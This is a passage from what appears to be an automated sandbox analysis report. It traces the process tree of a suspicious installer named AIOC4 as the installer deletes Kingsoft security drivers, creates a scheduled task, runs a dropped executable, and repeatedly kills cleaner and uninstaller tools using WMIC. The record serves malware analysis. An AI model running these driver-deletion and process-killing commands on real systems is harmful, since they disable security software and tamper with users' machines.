"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\ksskrpr.sys*
6⤵
PID:1744

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kavbootc_ev.sys kavbootc_ev.sys.remove
6⤵
PID:1996

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kavbootc_ev.sys*
6⤵
PID:1356

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kavbootc64_arm.sys kavbootc64_arm.sys.remove
6⤵
PID:1016

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kavbootc64_arm.sys*
6⤵
PID:1164

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kavbootc64_ev.sys kavbootc64_ev.sys.remove
6⤵
PID:548

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kavbootc64_ev.sys*
6⤵
PID:1948

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisboot.sys kisboot.sys.remove
6⤵
PID:1728

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisboot.sys*
6⤵
PID:1344

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisboot64.sys kisboot64.sys.remove
6⤵
PID:1988

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisboot64.sys*
6⤵
PID:676

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kiscore.sys kiscore.sys.remove
6⤵
PID:1668

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kiscore.sys*
6⤵
PID:1560

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisknl.sys kisknl.sys.remove
6⤵
PID:1408

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisknl.sys*
6⤵
PID:1044

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisknl_del.sys kisknl_del.sys.remove
6⤵
PID:1104

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisknl_del.sys*
6⤵
PID:292

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisknl64_arm.sys kisknl64_arm.sys.remove
6⤵
PID:1888

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisknl64_arm.sys*
6⤵
PID:1252

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetflt.sys kisnetflt.sys.remove
6⤵
PID:2012

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetflt.sys*
6⤵
PID:1396

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetflt64_arm.sys kisnetflt64_arm.sys.remove
6⤵
PID:1700

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetflt64_arm.sys*
6⤵
PID:1224

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetm_ev.sys kisnetm_ev.sys.remove
6⤵
PID:1380

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetm_ev.sys*
6⤵
PID:2016

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetm64_arm.sys kisnetm64_arm.sys.remove
6⤵
PID:2000

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetm64_arm.sys*
6⤵
PID:2032

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetm64_ev.sys kisnetm64_ev.sys.remove
6⤵
PID:2008

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetm64_ev.sys*
6⤵
PID:1884

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kisnetmxp.sys kisnetmxp.sys.remove
6⤵
PID:1648

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kisnetmxp.sys*
6⤵
PID:1364

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\ksapi.sys ksapi.sys.remove
6⤵
PID:960

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\ksapi.sys*
6⤵
PID:1740

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\ksapi64.sys ksapi64.sys.remove
6⤵
PID:968

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\ksapi64.sys*
6⤵
PID:1784

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\ksapi64_arm.sys ksapi64_arm.sys.remove
6⤵
PID:1752

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\ksapi64_arm.sys*
6⤵
PID:772

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kusbquery.sys kusbquery.sys.remove
6⤵
PID:984

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kusbquery.sys*
6⤵
PID:900

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\kusbquery64.sys kusbquery64.sys.remove
6⤵
PID:1660

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\kusbquery64.sys*
6⤵
PID:664

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\tfossiksy.sys tfossiksy.sys.remove
6⤵
PID:908

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C REN %SystemRoot%\System32\drivers\2345* 2345*.remove
6⤵
PID:1944

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\tfossiksy.sys*
6⤵
PID:880

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q /A %SystemRoot%\System32\drivers\2345*
6⤵
PID:584

C:\Program Files\AIOC4\PrimaryScreen.exe
"PrimaryScreen.exe" ScaleX
6⤵
- Executes dropped EXE
PID:1120

C:\Windows\system32\CMD.exe
"CMD" /C ver
6⤵
PID:1440

C:\Program Files\AIOC4\AIOC4.exe
"C:\Program Files\AIOC4\AIOC4.exe" /ClearAUTOUninstaller
6⤵
- Executes dropped EXE
- Sets file execution options in registry
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:1400

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "JServer" /XML "C:\Program Files\AIOC4\AIOC_Cache\Tools\JServer.XML"
7⤵
- Creates scheduled task(s)
PID:2080

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TASKKILL /F /IM AU_CN.exe
7⤵
PID:1212

C:\Windows\system32\taskkill.exe
TASKKILL /F /IM AU_CN.exe
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1668

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /S /Q /A %TEMP%\*aioc_*
7⤵
PID:2032

C:\ProgramData\Microsoft\s_a.exe
"C:\ProgramData\Microsoft\s_a.exe"
7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1524

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TASKKILL /F /IM "Easy remove - Autodesk系列软件卸载工具.exe"
7⤵
PID:1352

C:\Windows\system32\taskkill.exe
TASKKILL /F /IM "Easy remove - Autodesk系列软件卸载工具.exe"
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:676

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q %ALLUSERSPROFILE%\*Easy*remove*
7⤵
PID:1752

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q %ALLUSERSPROFILE%\node.dll
7⤵
PID:1884

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q %ALLUSERSPROFILE%\mntemp
7⤵
PID:1556

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q %ALLUSERSPROFILE%\node
7⤵
PID:2144

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q %ALLUSERSPROFILE%\webconfig.ini
7⤵
PID:2196

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q %SystemRoot%\SysWOW64\NSudo*.exe
7⤵
PID:2252

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q %SystemRoot%\System32\NSudo*.exe
7⤵
PID:2176

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C RD /S /Q "C:\ProgramData\uninstall"
7⤵
PID:2280

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C RD /S /Q "C:\ProgramData\TEMP"
7⤵
PID:2376

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\0.bat
7⤵
PID:2484

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%auto%uninstaller%'" DELETE
8⤵
PID:2624

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%au%cn%'" DELETE
8⤵
PID:2728

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%@%'" DELETE
8⤵
PID:1168

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%java%'" DELETE
8⤵
PID:2912

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%Easy%remove%'" DELETE
8⤵
PID:2764

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%geek%'" DELETE
8⤵
PID:2336

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%iobit%'" DELETE
8⤵
PID:2500

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%dism++%'" DELETE
8⤵
PID:1992

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%CCleaner%'" DELETE
8⤵
PID:2556

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%UninstallTool%' AND NOT ExecutablePath LIKE '%\\R1\\UninstallTool.exe'" DELETE
8⤵
PID:1380

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%RegWorkshop%'" DELETE
8⤵
PID:3000

C:\Windows\system32\PING.EXE
ping -n 2 0.0.0.0
8⤵
- Runs ping.exe
PID:3008

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%auto%uninstaller%'" DELETE
8⤵
PID:3032

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%au%cn%'" DELETE
8⤵
PID:2572

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%@%'" DELETE
8⤵
PID:3040

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%java%'" DELETE
8⤵
PID:1352

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%Easy%remove%'" DELETE
8⤵
PID:2592

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%geek%'" DELETE
8⤵
PID:2860

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%iobit%'" DELETE
8⤵
PID:2092

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%dism++%'" DELETE
8⤵
PID:2588

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%CCleaner%'" DELETE
8⤵
PID:2636

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%UninstallTool%' AND NOT ExecutablePath LIKE '%\\R1\\UninstallTool.exe'" DELETE
8⤵
PID:2260

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%RegWorkshop%'" DELETE
8⤵
PID:568

C:\Windows\system32\PING.EXE
ping -n 2 0.0.0.0
8⤵
- Runs ping.exe
PID:2328

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%auto%uninstaller%'" DELETE
8⤵
PID:2988

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%au%cn%'" DELETE
8⤵
PID:2580

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%@%'" DELETE
8⤵
PID:3004

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%java%'" DELETE
8⤵
PID:3048

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%Easy%remove%'" DELETE
8⤵
PID:2376

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%geek%'" DELETE
8⤵
PID:2712

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%iobit%'" DELETE
8⤵
PID:2432

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%dism++%'" DELETE
8⤵
PID:2788

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%CCleaner%'" DELETE
8⤵
PID:2832

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%UninstallTool%' AND NOT ExecutablePath LIKE '%\\R1\\UninstallTool.exe'" DELETE
8⤵
PID:2868

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%RegWorkshop%'" DELETE
8⤵
PID:2412

C:\Windows\system32\PING.EXE
ping -n 2 0.0.0.0
8⤵
- Runs ping.exe
PID:2636

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%auto%uninstaller%'" DELETE
8⤵
PID:2544

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%au%cn%'" DELETE
8⤵
PID:1932

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%@%'" DELETE
8⤵
PID:1820

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%java%'" DELETE
8⤵
PID:2496

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%Easy%remove%'" DELETE
8⤵
PID:2868

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%geek%'" DELETE
8⤵
PID:2336

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%iobit%'" DELETE
8⤵
PID:2380

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%dism++%'" DELETE
8⤵
PID:2348

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%CCleaner%'" DELETE
8⤵
PID:1740

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%UninstallTool%' AND NOT ExecutablePath LIKE '%\\R1\\UninstallTool.exe'" DELETE
8⤵
PID:2256

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%RegWorkshop%'" DELETE
8⤵
PID:3032

C:\Windows\system32\PING.EXE
ping -n 2 0.0.0.0
8⤵
- Runs ping.exe
PID:1700

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%auto%uninstaller%'" DELETE
8⤵
PID:2488

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%au%cn%'" DELETE
8⤵
PID:2812

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%@%'" DELETE
8⤵
PID:1148

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%java%'" DELETE
8⤵
PID:2900

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%Easy%remove%'" DELETE
8⤵
PID:2680

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%geek%'" DELETE
8⤵
PID:1316

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%iobit%'" DELETE
8⤵
PID:272

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%dism++%'" DELETE
8⤵
PID:2132

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%CCleaner%'" DELETE
8⤵
PID:2304

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%UninstallTool%' AND NOT ExecutablePath LIKE '%\\R1\\UninstallTool.exe'" DELETE
8⤵
PID:2088

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%RegWorkshop%'" DELETE
8⤵
PID:2516

C:\Windows\system32\PING.EXE
ping -n 2 0.0.0.0
8⤵
- Runs ping.exe
PID:2712

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%auto%uninstaller%'" DELETE
8⤵
PID:2900

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%au%cn%'" DELETE
8⤵
PID:2764

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%@%'" DELETE
8⤵
PID:1316

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%java%'" DELETE
8⤵
PID:272

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%Easy%remove%'" DELETE
8⤵
PID:2932

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%geek%'" DELETE
8⤵
PID:2844

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%iobit%'" DELETE
8⤵
PID:2616

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%dism++%'" DELETE
8⤵
PID:2280

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%CCleaner%'" DELETE
8⤵
PID:1752

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%UninstallTool%' AND NOT ExecutablePath LIKE '%\\R1\\UninstallTool.exe'" DELETE
8⤵
PID:2596

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%RegWorkshop%'" DELETE
8⤵
PID:2308

C:\Windows\system32\PING.EXE
ping -n 2 0.0.0.0
8⤵
- Runs ping.exe
PID:1016

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%auto%uninstaller%'" DELETE
8⤵
PID:2008

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%au%cn%'" DELETE
8⤵
PID:2772

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%@%'" DELETE
8⤵
PID:2032

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%java%'" DELETE
8⤵
PID:2384

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%Easy%remove%'" DELETE
8⤵
PID:1536

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%geek%'" DELETE
8⤵
PID:2896

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%iobit%'" DELETE
8⤵
PID:3004

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%dism++%'" DELETE
8⤵
PID:2616

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%CCleaner%'" DELETE
8⤵
PID:2320

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%UninstallTool%' AND NOT ExecutablePath LIKE '%\\R1\\UninstallTool.exe'" DELETE
8⤵
PID:3048

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%RegWorkshop%'" DELETE
8⤵
PID:2196

C:\Windows\system32\PING.EXE
ping -n 2 0.0.0.0
8⤵
- Runs ping.exe
PID:2224

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%auto%uninstaller%'" DELETE
8⤵
PID:2444

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%au%cn%'" DELETE
8⤵
PID:2528

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%@%'" DELETE
8⤵
PID:1648

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%java%'" DELETE
8⤵
PID:2756

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%Easy%remove%'" DELETE
8⤵
PID:2396

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%geek%'" DELETE
8⤵
PID:3056

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%iobit%'" DELETE
8⤵
PID:2992

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%dism++%'" DELETE
8⤵
PID:2652

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%CCleaner%'" DELETE
8⤵
PID:2996

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%UninstallTool%' AND NOT ExecutablePath LIKE '%\\R1\\UninstallTool.exe'" DELETE
8⤵
PID:3032

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%RegWorkshop%'" DELETE
8⤵
PID:2576

C:\Windows\system32\PING.EXE
ping -n 2 0.0.0.0
8⤵
- Runs ping.exe
PID:2276

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%auto%uninstaller%'" DELETE
8⤵
PID:2032

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%au%cn%'" DELETE
8⤵
PID:2384

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%@%'" DELETE
8⤵
PID:2972

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%java%'" DELETE
8⤵
PID:2564

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%Easy%remove%'" DELETE
8⤵
PID:2572

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%geek%'" DELETE
8⤵
PID:2924

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%iobit%'" DELETE
8⤵
PID:2172

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%dism++%'" DELETE
8⤵
PID:3028

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%CCleaner%'" DELETE
8⤵
PID:1352

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%UninstallTool%' AND NOT ExecutablePath LIKE '%\\R1\\UninstallTool.exe'" DELETE
8⤵
PID:2684

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%RegWorkshop%'" DELETE
8⤵
PID:1616

C:\Windows\system32\PING.EXE
ping -n 2 0.0.0.0
8⤵
- Runs ping.exe
PID:2248

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%auto%uninstaller%'" DELETE
8⤵
PID:2608

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%au%cn%'" DELETE
8⤵
PID:1316

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%@%'" DELETE
8⤵
PID:2144

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%java%'" DELETE
8⤵
PID:2828

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%Easy%remove%'" DELETE
8⤵
PID:2696

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%geek%'" DELETE
8⤵
PID:2744

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%iobit%'" DELETE
8⤵
PID:2264

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%dism++%'" DELETE
8⤵
PID:2928

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%CCleaner%'" DELETE
8⤵
PID:2232

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%UninstallTool%' AND NOT ExecutablePath LIKE '%\\R1\\UninstallTool.exe'" DELETE
8⤵
PID:2596

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%RegWorkshop%'" DELETE
8⤵
PID:3036

C:\Windows\system32\PING.EXE
ping -n 2 0.0.0.0
8⤵
- Runs ping.exe
PID:1948

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%auto%uninstaller%'" DELETE
8⤵
PID:1828

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%au%cn%'" DELETE
8⤵
PID:1600

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%@%'" DELETE
8⤵
PID:2676

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%java%'" DELETE
8⤵
PID:2012

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%Easy%remove%'" DELETE
8⤵
PID:3000

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%geek%'" DELETE
8⤵
PID:2924

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%iobit%'" DELETE
8⤵
PID:3052

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%dism++%'" DELETE
8⤵
PID:3032

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%CCleaner%'" DELETE
8⤵
PID:2204

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%UninstallTool%' AND NOT ExecutablePath LIKE '%\\R1\\UninstallTool.exe'" DELETE
8⤵
PID:1996

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%RegWorkshop%'" DELETE
8⤵
PID:1364

C:\Windows\system32\PING.EXE
ping -n 2 0.0.0.0
8⤵
- Runs ping.exe
PID:2192

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%auto%uninstaller%'" DELETE
8⤵
PID:2664

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%au%cn%'" DELETE
8⤵
PID:2332

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%@%'" DELETE
8⤵
PID:2840

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%java%'" DELETE
8⤵
PID:2380

C:\Windows\System32\Wbem\WMIC.exe
WMIC PROCESS WHERE "Name LIKE '%Easy%remove%'" DELETE
8⤵
